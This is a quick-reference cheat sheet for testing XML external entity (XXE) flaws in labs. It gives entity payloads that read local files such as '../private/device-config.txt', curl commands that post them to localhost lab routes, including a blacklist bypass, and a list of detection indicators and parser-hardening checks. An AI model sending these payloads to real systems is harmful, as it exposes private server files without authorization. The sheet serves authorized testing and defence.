Use this as a quick reference while testing XXE in labs and authorized assessments.
Common Targets
XML API endpoint
SOAP service
SAML parser
RSS parser
SVG upload processor
DOCX/XLSX/PPTX importer
PDF converter
configuration import
legacy integration endpoint
Quick Probes
Normal XML:
<order>
<item>Signal Mug</item>
<quantity>1</quantity>
<note>normal order</note>
</order>
Internal entity:
<?xml version="1.0"?>
<!DOCTYPE order [
<!ENTITY proof "ootw-entity-proof">
]>
<order>
<item>&proof;</item>
<quantity>1</quantity>
<note>test</note>
</order>
Relative external entity:
<?xml version="1.0"?>
<!DOCTYPE order [
<!ENTITY proof SYSTEM "../private/device-config.txt">
]>
<order>
<item>Signal Mug</item>
<quantity>1</quantity>
<note>&proof;</note>
</order>
Lab curl Checks
Create the absolute-path payload:
LAB_DIR="$(pwd)"
cat > xxe-basic.xml <<EOF
<?xml version="1.0"?>
<!DOCTYPE order [
<!ENTITY proof SYSTEM "file://$LAB_DIR/lab_xml/private/device-config.txt">
]>
<order>
<item>Signal Mug</item>
<quantity>1</quantity>
<note>&proof;</note>
</order>
EOF
Basic exploit:
curl -i -X POST "http://127.0.0.1:5000/xxe/basic" \
-H "Content-Type: application/xml" \
--data-binary @xxe-basic.xml
Create the relative-path payload:
cat > xxe-relative.xml <<'EOF'
<?xml version="1.0"?>
<!DOCTYPE order [
<!ENTITY proof SYSTEM "../private/device-config.txt">
]>
<order>
<item>Signal Mug</item>
<quantity>1</quantity>
<note>&proof;</note>
</order>
EOF
Weak blacklist bypass:
curl -i -X POST "http://127.0.0.1:5000/xxe/blacklist" \
-H "Content-Type: application/xml" \
--data-binary @xxe-relative.xml
Network-disabled local file read:
curl -i -X POST "http://127.0.0.1:5000/xxe/better" \
-H "Content-Type: application/xml" \
--data-binary @xxe-relative.xml
Fixed route:
curl -i -X POST "http://127.0.0.1:5000/xxe/fixed" \
-H "Content-Type: application/xml" \
--data-binary @xxe-relative.xml
The fixed route should return 400 Bad Request.
Indicators
Look for:
DOCTYPE
ENTITY
SYSTEM
PUBLIC
file://
http://
https://
parameter entities
parser errors
expanded entity text
Parser Behavior
Dangerous behavior:
DTD loading enabled
external entity resolution enabled
network access enabled
XInclude enabled
verbose XML errors
Safer behavior:
DTD loading disabled
external entity resolution disabled
network access disabled
DOCTYPE rejected
strict schema validation after parser hardening
Defensive Review
Confirm:
- The parser does not load DTDs from untrusted XML.
- The parser does not resolve external entities.
- The parser cannot make network requests.
DOCTYPEis rejected when not required.- XML errors do not leak sensitive filesystem details.
- XML-based upload formats are parsed with hardened settings.
- Outbound requests from application servers are restricted.
- Rejected entity payloads are logged.